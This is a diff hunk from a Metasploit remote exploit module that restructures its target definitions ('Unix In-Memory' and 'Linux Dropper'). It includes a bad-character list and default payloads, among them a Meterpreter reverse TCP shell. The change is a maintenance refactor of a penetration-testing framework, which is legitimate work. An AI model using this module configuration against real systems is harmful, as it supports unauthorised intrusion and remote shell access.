@@ -40,27 +40,29 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2019-04-24', # Public disclosure
         'License' => MSF_LICENSE,
-        'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'Privileged' => true,
         'Targets' => [
           [
             'Unix In-Memory',
-            'Platform' => 'unix',
-            'Arch' => ARCH_CMD,
-            'Type' => :unix_memory,
-            'Payload' => {
-              'BadChars' => %Q(&*(){}[]`;|?\n~<>"'),
-              'Encoder' => 'generic/none' # Force manual badchar analysis
-            },
-            'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/generic' }
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_memory,
+              'Payload' => {
+                'BadChars' => %(&*(){}[]`;|?\n~<>"'),
+                'Encoder' => 'generic/none' # Force manual badchar analysis
+              },
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/generic' }
+            }
           ],
           [
             'Linux Dropper',
-            'Platform' => 'linux',
-            'Arch' => [ARCH_X86, ARCH_X64],
-            'Type' => :linux_dropper,
-            'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp' }
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp' }
+            }
           ]
         ],
         'DefaultTarget' => 1,
